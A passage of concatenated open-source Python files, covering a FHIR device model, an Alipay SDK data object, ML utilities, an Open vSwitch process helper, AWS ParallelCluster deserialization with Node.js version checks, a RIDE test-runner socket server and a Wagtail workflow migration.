subJurisdiction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_subJurisdiction", title="Extension field for ``subJurisdiction``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionUdiDeviceIdentifierMarketDistribution`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"marketPeriod",
"subJurisdiction",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_5604(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("subJurisdiction", "subJurisdiction__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionVersion(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
The version of the device or software.
"""
resource_type = Field("DeviceDefinitionVersion", const=True)
component: fhirtypes.IdentifierType = Field(
None,
alias="component",
title=(
"The hardware or software module of the device to which the version "
"applies"
),
description=None,
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.CodeableConceptType = Field(
None,
alias="type",
title="The type of the device version, e.g. manufacturer, approved, internal",
description=None,
# if property is element of this resource.
element_property=True,
)
value: fhirtypes.String = Field(
None,
alias="value",
title="The version text",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_value", title="Extension field for ``value``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionVersion`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "type", "component", "value"]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_2545(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("value", "value__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
# ===== alipay/alipay-sdk-python-all :: alipay/aop/api/domain/ScenePayBusinessParamDTO.py (Apache-2.0, Python) =====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ScenePayBusinessParamDTO(object):
def __init__(self):
self._custom_params = None
self._mall_cell_id = None
self._mall_cell_type = None
self._mall_id = None
self._mall_pid = None
self._plan_id = None
self._real_store_id = None
self._voucher_id = None
@property
def custom_params(self):
return self._custom_params
@custom_params.setter
def custom_params(self, value):
self._custom_params = value
@property
def mall_cell_id(self):
return self._mall_cell_id
@mall_cell_id.setter
def mall_cell_id(self, value):
self._mall_cell_id = value
@property
def mall_cell_type(self):
return self._mall_cell_type
@mall_cell_type.setter
def mall_cell_type(self, value):
self._mall_cell_type = value
@property
def mall_id(self):
return self._mall_id
@mall_id.setter
def mall_id(self, value):
self._mall_id = value
@property
def mall_pid(self):
return self._mall_pid
@mall_pid.setter
def mall_pid(self, value):
self._mall_pid = value
@property
def plan_id(self):
return self._plan_id
@plan_id.setter
def plan_id(self, value):
self._plan_id = value
@property
def real_store_id(self):
return self._real_store_id
@real_store_id.setter
def real_store_id(self, value):
self._real_store_id = value
@property
def voucher_id(self):
return self._voucher_id
@voucher_id.setter
def voucher_id(self, value):
self._voucher_id = value
def to_alipay_dict(self):
params = dict()
if self.custom_params:
if hasattr(self.custom_params, 'to_alipay_dict'):
params['custom_params'] = self.custom_params.to_alipay_dict()
else:
params['custom_params'] = self.custom_params
if self.mall_cell_id:
if hasattr(self.mall_cell_id, 'to_alipay_dict'):
params['mall_cell_id'] = self.mall_cell_id.to_alipay_dict()
else:
params['mall_cell_id'] = self.mall_cell_id
if self.mall_cell_type:
if hasattr(self.mall_cell_type, 'to_alipay_dict'):
params['mall_cell_type'] = self.mall_cell_type.to_alipay_dict()
else:
params['mall_cell_type'] = self.mall_cell_type
if self.mall_id:
if hasattr(self.mall_id, 'to_alipay_dict'):
params['mall_id'] = self.mall_id.to_alipay_dict()
else:
params['mall_id'] = self.mall_id
if self.mall_pid:
if hasattr(self.mall_pid, 'to_alipay_dict'):
params['mall_pid'] = self.mall_pid.to_alipay_dict()
else:
params['mall_pid'] = self.mall_pid
if self.plan_id:
if hasattr(self.plan_id, 'to_alipay_dict'):
params['plan_id'] = self.plan_id.to_alipay_dict()
else:
params['plan_id'] = self.plan_id
if self.real_store_id:
if hasattr(self.real_store_id, 'to_alipay_dict'):
params['real_store_id'] = self.real_store_id.to_alipay_dict()
else:
params['real_store_id'] = self.real_store_id
if self.voucher_id:
if hasattr(self.voucher_id, 'to_alipay_dict'):
params['voucher_id'] = self.voucher_id.to_alipay_dict()
else:
params['voucher_id'] = self.voucher_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ScenePayBusinessParamDTO()
if 'custom_params' in d:
o.custom_params = d['custom_params']
if 'mall_cell_id' in d:
o.mall_cell_id = d['mall_cell_id']
if 'mall_cell_type' in d:
o.mall_cell_type = d['mall_cell_type']
if 'mall_id' in d:
o.mall_id = d['mall_id']
if 'mall_pid' in d:
o.mall_pid = d['mall_pid']
if 'plan_id' in d:
o.plan_id = d['plan_id']
if 'real_store_id' in d:
o.real_store_id = d['real_store_id']
if 'voucher_id' in d:
o.voucher_id = d['voucher_id']
return o
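# Illustrative round-trip sketch (not part of the SDK); the field values below
# are made-up placeholders:
if __name__ == '__main__':
    dto = ScenePayBusinessParamDTO()
    dto.mall_id = '2021001234'
    dto.voucher_id = 'VOUCHER_001'
    exported = dto.to_alipay_dict()  # {'mall_id': '2021001234', 'voucher_id': 'VOUCHER_001'}
    restored = ScenePayBusinessParamDTO.from_alipay_dict(exported)
    assert restored.mall_id == dto.mall_id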
# ===== dmlc/dgl :: examples/pytorch/dimenet/modules/activations.py (Apache-2.0, Python) =====
import torch
def swish(x):
"""
Swish activation function,
    from Ramachandran, Zoph, Le 2017. "Searching for Activation Functions"
"""
return x * torch.sigmoid(x)
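# Quick illustrative check: swish(0) == 0, and swish(x) approaches x for large
# positive x because sigmoid(x) tends to 1.
if __name__ == "__main__":
    x = torch.tensor([-1.0, 0.0, 1.0])
    print(swish(x))  # approximately tensor([-0.2689, 0.0000, 0.7311])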
# ===== sony/nnabla-examples :: image-classification/imagenet/obsolete/args.py (multiple licenses, Python) =====
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def get_args(monitor_path='tmp.monitor.imagenet', max_iter=500000, model_save_path=None, learning_rate=1e-1, batch_size=8,
weight_decay=1e-4, accum_grad=32, tiny_mode=False, train_cachefile_dir=None, val_cachefile_dir=None,
train_list="label/train", val_list="label/val", num_threads=4):
"""
Get command line arguments.
Arguments set the default values of command line arguments.
"""
import argparse
import os
if model_save_path is None:
model_save_path = monitor_path
parser = argparse.ArgumentParser(
description='''(Tiny) ImageNet classification example.
''')
parser.add_argument("--batch-size", "-b", type=int, default=batch_size)
parser.add_argument("--accum-grad", "-a", type=int, default=accum_grad,
help='Parameters are updated by the gradient accumulated by multiple mini-batches.')
parser.add_argument("--learning-rate", "-l",
type=float, default=learning_rate)
def parse_tuple(x):
return tuple(map(int, x.split(',')))
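    # For example, parse_tuple("150000,300000,450000") returns (150000, 300000, 450000).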
parser.add_argument("--learning-rate-decay-at", "-D",
default=(150000, 300000, 450000), type=parse_tuple,
                        help='Execution points of learning rate decay in the format (x1,x2,...,xn). The learning rate will be multiplied by 0.1 at each iteration specified.')
parser.add_argument("--monitor-path", "-m",
type=str, default=monitor_path,
                        help='Path where monitoring logs are saved.')
parser.add_argument("--max-iter", "-i", type=int, default=max_iter,
help='Max iteration of training.')
parser.add_argument("--val-interval", "-v", type=int, default=100,
help='Validation interval.')
parser.add_argument("--val-iter", "-j", type=int, default=10,
                        help='Each validation runs `val_iter` mini-batch iterations.')
parser.add_argument("--weight-decay", "-w",
type=float, default=weight_decay,
help='Weight decay factor of SGD update.')
parser.add_argument("--device-id", "-d", type=str, default='0',
                        help='Device ID the training runs on. This is only valid if you specify `-c cudnn`.')
parser.add_argument("--type-config", "-t", type=str, default='float',
help='Type configuration.')
parser.add_argument("--model-save-interval", "-s", type=int, default=1000,
help='The interval of saving model parameters.')
parser.add_argument("--model-save-path", "-o",
type=str, default=model_save_path,
                        help='Path where the model parameters are saved.')
parser.add_argument("--model-load-path", type=str, default=None,
help='Path to the model parameters to be loaded.')
parser.add_argument("--top-n", type=int, default=1,
help='Top-n error.')
parser.add_argument('--context', '-c', type=str,
default=None, help="Extension module. 'cudnn' is highly.recommended.")
parser.add_argument("--num-layers", "-L", type=int,
choices=[18, 34, 50, 101, 152], default=34,
help='Number of layers of ResNet.')
parser.add_argument("--shortcut-type", "-S", type=str,
choices=['b', 'c', ''], default='b',
                        help='Skip connection type. See `resnet_imagenet()` in model_resnet.py for a description.')
parser.add_argument("--tiny-mode", "-M", type=bool, default=tiny_mode,
                        help='Use the Tiny ImageNet dataset.')
parser.add_argument("--train-cachefile-dir", "-T", type=str, default=train_cachefile_dir,
                        help='Training cache file dir. Create it with create_cache_file.py.')
parser.add_argument("--val-cachefile-dir", "-V", type=str, default=val_cachefile_dir,
                        help='Validation cache file dir. Create it with create_cache_file.py.')
parser.add_argument("--train-list", "-TL", type=str, default=train_list,
help='Training file list.')
parser.add_argument("--val-list", "-VL", type=str, default=val_list,
help='Validation file list.')
parser.add_argument("--random-area", type=parse_tuple, default=(0.08, 1.0),
help="Random area of the RandomResizedCrop augmentation.")
parser.add_argument("--num-threads", "-N", type=int, default=num_threads,
help="DALI's the number of threads.")
parser.add_argument("--checkpoint", type=str, default=None,
help='path to checkpoint file')
args = parser.parse_args()
if not os.path.isdir(args.model_save_path):
os.makedirs(args.model_save_path)
return args
# ===== openvswitch/ovs :: python/ovs/process.py (Apache-2.0 and others, Python) =====
# Copyright (c) 2010, 2011 Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import signal
def _signal_status_msg(type_, signr):
s = "%s by signal %d" % (type_, signr)
for name in signal.__dict__:
if name.startswith("SIG") and getattr(signal, name) == signr:
return "%s (%s)" % (s, name)
return s
def status_msg(status):
"""Given 'status', which is a process status in the form reported by
waitpid(2) and returned by process_status(), returns a string describing
how the process terminated."""
if os.WIFEXITED(status):
s = "exit status %d" % os.WEXITSTATUS(status)
elif os.WIFSIGNALED(status):
s = _signal_status_msg("killed", os.WTERMSIG(status))
elif os.WIFSTOPPED(status):
s = _signal_status_msg("stopped", os.WSTOPSIG(status))
else:
s = "terminated abnormally (%x)" % status
if os.WCOREDUMP(status):
s += ", core dumped"
return s
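# Illustrative POSIX-only sketch: waitpid-style statuses encode a normal exit
# in the high byte and a terminating signal in the low byte, so synthetic
# values can exercise both branches of status_msg().
if __name__ == '__main__':
    print(status_msg(1 << 8))  # "exit status 1"
    print(status_msg(9))       # "killed by signal 9 (SIGKILL)"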
# ===== aws/aws-parallelcluster :: cli/src/pcluster/api/util.py (Apache-2.0 and others, Python) =====
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at http://aws.amazon.com/apache2.0/
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
# Generated by OpenAPI Generator (python-flask)
import datetime
import logging
import shutil
# A nosec comment is appended to the following line in order to disable the B404 check.
# In this file the input of the module subprocess is trusted.
import subprocess # nosec B404
import six
from pkg_resources import packaging
from pcluster.api import typing_utils
from pcluster.constants import NODEJS_INCOMPATIBLE_VERSION_RANGE, NODEJS_MIN_VERSION
LOGGER = logging.getLogger(__name__)
def _deserialize(data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if klass in six.integer_types or klass in (float, str, bool, bytearray):
return _deserialize_primitive(data, klass)
if klass == object:
return _deserialize_object(data)
if klass == datetime.date:
return deserialize_date(data)
if klass == datetime.datetime:
return deserialize_datetime(data)
if typing_utils.is_generic(klass):
if typing_utils.is_list(klass):
return _deserialize_list(data, klass.__args__[0])
if typing_utils.is_dict(klass):
return _deserialize_dict(data, klass.__args__[1])
return deserialize_model(data, klass)
def _deserialize_primitive(data, klass):
"""Deserializes to primitive type.
:param data: data to deserialize.
:param klass: class literal.
:return: int, long, float, str, bool.
:rtype: int | long | float | str | bool
"""
try:
value = klass(data)
except UnicodeEncodeError:
value = six.u(data)
except TypeError:
value = data
return value
def _deserialize_object(value):
"""Return an original value.
:return: object.
"""
return value
def deserialize_date(string):
"""Deserializes string to date.
:param string: str.
:type string: str
:return: date.
:rtype: date
"""
try:
from dateutil.parser import parse # pylint: disable=C0415
return parse(string).date()
except ImportError:
return string
def deserialize_datetime(string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:type string: str
:return: datetime.
:rtype: datetime
"""
try:
from dateutil.parser import parse # pylint: disable=C0415
return parse(string)
except ImportError:
return string
def deserialize_model(data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:type data: dict | list
:param klass: class literal.
:return: model object.
"""
instance = klass()
if not instance.openapi_types:
return data
for attr, attr_type in six.iteritems(instance.openapi_types):
if data is not None and instance.attribute_map[attr] in data and isinstance(data, (list, dict)):
value = data[instance.attribute_map[attr]]
setattr(instance, attr, _deserialize(value, attr_type))
return instance
def _deserialize_list(data, boxed_type):
"""Deserializes a list and its elements.
:param data: list to deserialize.
:type data: list
:param boxed_type: class literal.
:return: deserialized list.
:rtype: list
"""
return [_deserialize(sub_data, boxed_type) for sub_data in data]
def _deserialize_dict(data, boxed_type):
"""Deserializes a dict and its elements.
:param data: dict to deserialize.
:type data: dict
:param boxed_type: class literal.
:return: deserialized dict.
:rtype: dict
"""
return {k: _deserialize(v, boxed_type) for k, v in six.iteritems(data)}
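# Illustrative sketch (assumes ``import typing``, which this module does not
# do itself): primitives are coerced and generic containers recurse
# element-by-element.
#
#   _deserialize(["1", "2"], typing.List[int])        ->  [1, 2]
#   _deserialize({"a": "1"}, typing.Dict[str, int])   ->  {"a": 1}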
def assert_valid_node_js():
_assert_node_executable()
_assert_node_version()
def _assert_node_executable():
node_exe = shutil.which("node")
LOGGER.debug("Found Node.js executable in %s", node_exe)
if not node_exe:
message = (
"Unable to find node executable. Node.js is required by the AWS CDK library used by ParallelCluster, "
"see installation instructions here: https://docs.aws.amazon.com/parallelcluster/latest/ug/install-v3.html"
)
LOGGER.critical(message)
raise Exception(message)
def _assert_node_version():
try:
# A nosec comment is appended to the following line in order to disable the B607 and B603 checks.
# It is a false positive since the PATH search is wanted and the input of the check_output is static.
# [B607:start_process_with_partial_path] Is suppressed because location of executable is retrieved from env
# PATH
# [B603:subprocess_without_shell_equals_true] Is suppressed because input of check_output is not coming from
# untrusted source
node_version_string = subprocess.check_output( # nosec B607 B603
["node", "--version"], stderr=subprocess.STDOUT, shell=False, encoding="utf-8"
)
LOGGER.debug("Found Node.js version (%s)", node_version_string)
except Exception:
LOGGER.debug("Unable to determine current Node.js version from node")
try:
# A nosec comment is appended to the following line in order to disable the B607 and B603 checks.
# It is a false positive since the PATH search is wanted and the input of the check_output is static.
# [B607:start_process_with_partial_path] Is suppressed because location of executable is retrieved from env
# PATH
# [B603:subprocess_without_shell_equals_true] Is suppressed because input of check_output is not coming from
# untrusted source
node_version_string = subprocess.check_output( # nosec B607 B603
["nvm", "current"], stderr=subprocess.STDOUT, shell=False, encoding="utf-8"
)
LOGGER.debug("Found Node.js version '%s' in use", node_version_string)
except Exception:
message = "Unable to check Node.js version"
LOGGER.critical(message)
raise Exception(message)
# `nvm current` will return `none` if no versions of Node.js are currently installed.
if node_version_string == "none":
message = (
"Node.js does not appear to be installed. Please use the Node Version Manager (nvm) to install a"
" version of Node.js compatible with this platform."
)
else:
message = (
f"Unable to invoke Node.js for the installed version {node_version_string}. This version may not be"
" compatible with this platform. Please use the Node Version Manager (nvm) to install and use a"
" compatible version of Node.js compatible with this platform."
)
LOGGER.critical(message)
raise Exception(message)
node_version = packaging.version.parse(node_version_string)
if node_version < packaging.version.parse(NODEJS_MIN_VERSION):
message = (
f"AWS CDK library used by ParallelCluster requires Node.js version >= {NODEJS_MIN_VERSION},"
" see installation instructions here: https://docs.aws.amazon.com/parallelcluster/latest/ug/install-v3.html"
)
LOGGER.critical(message)
raise Exception(message)
if (
packaging.version.parse(NODEJS_INCOMPATIBLE_VERSION_RANGE[0])
<= node_version
<= packaging.version.parse(NODEJS_INCOMPATIBLE_VERSION_RANGE[1])
):
message = (
f"AWS CDK library used by ParallelCluster requires Node.js to not be in the range"
f" {NODEJS_INCOMPATIBLE_VERSION_RANGE}, but installed Node.js version {node_version_string}"
f" is within this range, see https://docs.aws.amazon.com/cdk/v2/guide/getting_started.html"
)
LOGGER.critical(message)
raise Exception(message)
# ===== robotframework/RIDE :: src/robotide/contrib/testrunner/testrunner.py (Apache-2.0, Python) =====
# Copyright 2010 Orbitz WorldWide
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by NSN
# Copyright 2010-2012 Nokia Solutions and Networks
# Copyright 2013-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socketserver as SocketServer
import threading
from robotide.contrib.testrunner.Process import Process
from robotide.contrib.testrunner.TestRunnerAgent import StreamHandler
from robotide.controller.testexecutionresults import TestExecutionResults
# Solution from https://stackoverflow.com/questions/10009753/
# python-dealing-with-mixed-encoding-files
def mixed_decoder(unicode_error):
    # Python 3 API: ``unicode_error.object`` holds the bytes being decoded,
    # and ``bytes.hex()`` replaces the removed ``encode('hex')``.
    err_bytes = unicode_error.object
    next_position = unicode_error.end
    err_hex = err_bytes[unicode_error.start:unicode_error.end].hex()
    # Alternative: return u'?', next_position
    return u'%s' % err_hex, next_position  # Comment this line out to get a ?
# codecs.register_error("mixed", mixed_decoder)
class TestRunner(object):
def __init__(self, project):
self._process = None
self._server = None
self._server_thread = None
self._pause_on_failure = False
self._pid_to_kill = None
self._results = TestExecutionResults()
self._port = None
self._project = project
self.profiles = {}
self._pause_longname = None
self._pause_testname = None
def enable(self, result_handler):
self._start_listener_server(result_handler)
def add_profile(self, name, item):
self.profiles[name] = item
def get_profile(self, name):
return self.profiles[name]
def get_profile_names(self):
return sorted(self.profiles.keys())
def _start_listener_server(self, result_handler):
def handle(*args):
self._result_handler(*args)
result_handler(*args)
self._server = RideListenerServer(RideListenerHandler, handle)
self._server_thread = threading.Thread(
target=self._server.serve_forever)
# DEPRECATED: self._server_thread.setDaemon(True)
self._server_thread.daemon = True
self._server_thread.start()
self._port = self._server.server_address[1]
def _result_handler(self, event, *args):
if event == 'pid':
self._pid_to_kill = int(args[0])
if event == 'port' and self._process:
self._process.set_port(args[0])
if event == 'start_test':
longname = args[1]['longname']
testname = args[0]
self._results.set_running(self._get_test_controller(longname,
testname))
self._pause_longname = longname
self._pause_testname = testname
if event == 'continue':
self._results.set_running(self._get_test_controller(
self._pause_longname, self._pause_testname))
if event == 'paused':
self._results.set_paused(self._get_test_controller(
self._pause_longname, self._pause_testname))
if event == 'end_test':
longname = args[1]['longname']
testname = args[0]
if args[1]['status'] == 'PASS':
self._results.set_passed(self._get_test_controller(longname,
testname))
elif args[1]['status'] == 'SKIP':
self._results.set_skipped(self._get_test_controller(longname,
testname))
else:
self._results.set_failed(self._get_test_controller(longname,
testname))
def _get_test_controller(self, longname, testname=None):
ret = self._project.find_controller_by_longname(longname, testname)
return ret
def clear_server(self):
self._server = None
def shutdown_server(self):
if self._server:
self._server.shutdown()
def test_execution_started(self):
self._results.test_execution_started()
def kill_process(self):
if self._process:
self._process.kill(force=True)
def send_pause_on_failure(self, pause):
if self._process:
self._process.pause_on_failure(pause)
def send_stop_signal(self):
if self._process:
self._process.kill(killer_pid=self._pid_to_kill)
def send_pause_signal(self):
if self._process:
self._process.pause()
def send_continue_signal(self):
if self._process:
self._process.resume()
def send_step_next_signal(self):
if self._process:
self._process.step_next()
def send_step_over_signal(self):
if self._process:
self._process.step_over()
def run_command(self, command, cwd):
self._pid_to_kill = None
self._process = Process(cwd)
self._process.run_command(command)
def get_output_and_errors(self, profile):
stdout, stderr, returncode = self._process.get_output(), \
self._process.get_errors(), \
self._process.get_returncode()
error, log_message = profile.format_error(stderr, returncode)
return stdout, error, log_message
def get_listener_port(self):
return self._port
def is_running(self):
return self._process and self._process.is_alive()
def command_ended(self):
self._results.set_stopped(None)
self._process = None
# The following two classes implement a small line-buffered socket
# server. It is designed to run in a separate thread, read data
# from the given port and update the UI -- hopefully all in a
# thread-safe manner.
class RideListenerServer(SocketServer.TCPServer):
"""Implements a simple line-buffered socket server"""
allow_reuse_address = True
def __init__(self, request_handler_class, callback):
SocketServer.TCPServer.__init__(self, ("", 0), request_handler_class)
self.callback = callback
class RideListenerHandler(SocketServer.StreamRequestHandler):
def handle(self):
decoder = StreamHandler(self.request.makefile('r'))
while True:
try:
(name, args) = decoder.load()
self.server.callback(name, *args)
except (EOFError, IOError):
# I should log this...
break
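# Illustrative wiring sketch (hypothetical callback): the server binds to an
# ephemeral port, which a runner reads back and serves from a daemon thread,
# mirroring TestRunner._start_listener_server above.
#
#   server = RideListenerServer(RideListenerHandler,
#                               lambda name, *args: print(name, args))
#   port = server.server_address[1]  # ephemeral port chosen by the OS
#   threading.Thread(target=server.serve_forever, daemon=True).start()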
# ===== wagtail/wagtail :: wagtail/migrations/0047_add_workflow_models.py (BSD-3-Clause, Python) =====
# Generated by Django 3.0.3 on 2020-03-03 15:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
("contenttypes", "0002_remove_content_type_name"),
("wagtailcore", "0046_site_name_remove_null"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("auth", "0011_update_proxy_permissions"),
]
operations = [
migrations.CreateModel(
name="Task",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=255, verbose_name="name")),
(
"active",
models.BooleanField(
default=True,
help_text="Active tasks can be added to workflows. Deactivating a task does not remove it from existing workflows.",
verbose_name="active",
),
),
(
"content_type",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="wagtail_tasks",
to="contenttypes.ContentType",
verbose_name="content type",
),
),
],
options={
"verbose_name": "task",
"verbose_name_plural": "tasks",
},
),
migrations.CreateModel(
name="TaskState",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"status",
models.CharField(
choices=[
("in_progress", "In progress"),
("approved", "Approved"),
("rejected", "Rejected"),
("skipped", "Skipped"),
("cancelled", "Cancelled"),
],
default="in_progress",
max_length=50,
verbose_name="status",
),
),
(
"started_at",
models.DateTimeField(auto_now_add=True, verbose_name="started at"),
),
(
"finished_at",
models.DateTimeField(
blank=True, null=True, verbose_name="finished at"
),
),
(
"content_type",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="wagtail_task_states",
to="contenttypes.ContentType",
verbose_name="content type",
),
),
(
"page_revision",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="task_states",
to="wagtailcore.PageRevision",
verbose_name="revision",
),
),
(
"task",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="task_states",
to="wagtailcore.Task",
verbose_name="task",
),
),
],
options={
"verbose_name": "Task state",
"verbose_name_plural": "Task states",
},
),
migrations.CreateModel(
name="Workflow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=255, verbose_name="name")),
(
"active",
models.BooleanField(
default=True,
help_text="Active workflows can be added to pages/snippets. Deactivating a workflow does not remove it from existing pages/snippets.",
verbose_name="active",
),
),
],
options={
"verbose_name": "workflow",
"verbose_name_plural": "workflows",
},
),
migrations.CreateModel(
name="GroupApprovalTask",
fields=[
(
"task_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Task",
),
),
],
options={
"verbose_name": "Group approval task",
"verbose_name_plural": "Group approval tasks",
},
bases=("wagtailcore.task",),
),
migrations.CreateModel(
name="WorkflowState",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"status",
models.CharField(
choices=[
("in_progress", "In progress"),
("approved", "Approved"),
("rejected", "Rejected"),
("cancelled", "Cancelled"),
],
default="in_progress",
max_length=50,
verbose_name="status",
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="created at"),
),
(
"current_task_state",
models.OneToOneField(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="wagtailcore.TaskState",
verbose_name="current task state",
),
),
(
"page",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_states",
to="wagtailcore.Page",
verbose_name="page",
),
),
(
"requested_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="requested_workflows",
to=settings.AUTH_USER_MODEL,
verbose_name="requested by",
),
),
(
"workflow",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_states",
to="wagtailcore.Workflow",
verbose_name="workflow",
),
),
],
options={
"verbose_name": "Workflow state",
"verbose_name_plural": "Workflow states",
},
),
migrations.CreateModel(
name="WorkflowPage",
fields=[
(
"page",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
verbose_name="page",
),
),
(
"workflow",
